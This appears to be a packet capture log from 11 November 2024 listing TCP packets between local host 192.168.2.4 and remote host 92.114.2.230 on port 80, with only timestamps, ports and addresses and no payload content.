                                                                                                                                                Nov 11, 2024 19:16:47.953845978 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.953876972 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.954720974 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954735994 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954746008 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954758883 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954771042 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.954770088 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.954809904 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.954845905 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.955734968 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955748081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955759048 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955771923 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955784082 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955796003 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.955796003 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.955838919 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.955838919 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.956501007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.074505091 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.075345039 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075357914 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075370073 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075381994 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075388908 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.075395107 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075407028 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.075436115 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.075467110 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.076216936 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076230049 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076241016 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076252937 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076271057 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.076301098 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.076905966 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076919079 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076936007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076950073 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076962948 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076971054 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.076975107 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.076996088 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.077020884 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.078658104 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.078789949 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.078840017 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.078933001 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.079087973 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.079149008 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.079220057 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.079233885 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.079273939 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081042051 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081062078 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081073999 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081085920 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081096888 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081110001 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081120014 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081123114 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081135988 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081202030 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081202984 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081207037 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081219912 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081233025 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081252098 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081257105 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081264973 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081295967 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081367970 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081386089 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081398964 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.081409931 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.081442118 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.082231045 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082243919 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082253933 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082266092 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082278967 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082277060 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.082290888 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.082309008 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.082339048 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.083069086 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083081961 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083093882 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083164930 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.083225965 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083240032 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.083262920 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084064960 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084078074 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084088087 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084100962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084110975 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084112883 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084125996 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084136963 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084194899 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084728003 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084741116 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084752083 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084764004 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084770918 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084775925 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.084800959 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.084830046 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.085536957 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085555077 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085609913 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.085715055 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085726976 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085740089 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085745096 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.085767984 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.085814953 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.086388111 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086401939 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086441040 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.086575985 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086590052 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086601019 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086611986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.086626053 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.086654902 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.087379932 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.087393045 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.087404966 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.087435007 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.130229950 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.138067007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.138147116 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.138159990 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.138431072 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.186655045 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.186745882 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.186758041 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.186872959 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.187107086 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187119007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187129974 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187143087 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187160969 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.187180996 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.187731981 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187743902 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187755108 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187767029 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187786102 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.187789917 CET4973180192.168.2.492.114.2.230
Timestamp                            Src Port  Dst Port  Src IP         Dst IP
Nov 11, 2024 19:16:48.187817097 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.187846899 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.188606977 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.188618898 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.188630104 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.188641071 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.188652992 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.188664913 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.188669920 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.188702106 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.188720942 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.189553976 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.189565897 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.189577103 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.189589977 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.189605951 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.189646959 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.189646959 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.190326929 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.190345049 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.190356970 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.190365076 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.190370083 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.190382004 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.190391064 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.190397978 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.190428019 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.191224098 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.191236019 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.191246986 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.191260099 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.191267014 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.191276073 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.191297054 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.191358089 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.192142963 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192156076 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192171097 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192183018 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192194939 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192207098 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192219973 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.192250013 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.192955971 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192967892 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192979097 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.192991018 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.193001986 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.193027973 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.193061113 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.193772078 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.193784952 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.193794966 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.193806887 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.193818092 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.193820953 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.193830967 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.193845987 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.193872929 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.194643974 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.194657087 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.194670916 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.194684029 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.194691896 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.194694996 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.194706917 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.194735050 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.195359945 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.195373058 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.195383072 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.195394993 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.195400000 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.195411921 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.195424080 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.195436001 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.195447922 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.195728064 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.195765972 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.196332932 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.196346045 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.196356058 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.196367979 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.196378946 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.196386099 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.196393967 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.196407080 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.196410894 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.196422100 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.196434975 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.196460009 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.197356939 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.197369099 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.197381020 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.197391987 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.197406054 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.197415113 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.197416067 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.197417974 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.197429895 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.197443962 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.197448969 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.197472095 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.198266983 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.198280096 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.198292017 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.198306084 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.198313951 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.198318005 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.198333025 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.198338032 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.198350906 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.198364019 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.198374033 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.198394060 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.199206114 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199219942 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199251890 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.199438095 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199450016 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199460983 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199471951 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199489117 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.199495077 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199505091 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.199511051 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199525118 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199532986 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.199537039 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.199563980 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.200485945 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.200499058 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.200514078 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.200525999 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.200534105 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.200539112 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.200553894 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.200565100 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.200562954 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.200586081 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.200622082 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.201596975 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.201610088 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.201621056 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.201632977 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.201644897 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.201658010 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.201669931 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.201679945 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.201682091 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.201721907 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.202452898 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.202466011 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.202481031 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.202493906 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.202506065 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.202519894 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.202528000 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.202533007 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.202547073 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.202553034 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.202605009 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.203363895 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.203376055 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.203387022 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.203398943 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.203404903 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.203412056 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.203421116 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.203435898 CET  80        49731     92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:48.203444958 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.203444958 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.203532934 CET  49731     80        192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:48.204240084 CET  80        49731     92.114.2.230   192.168.2.4
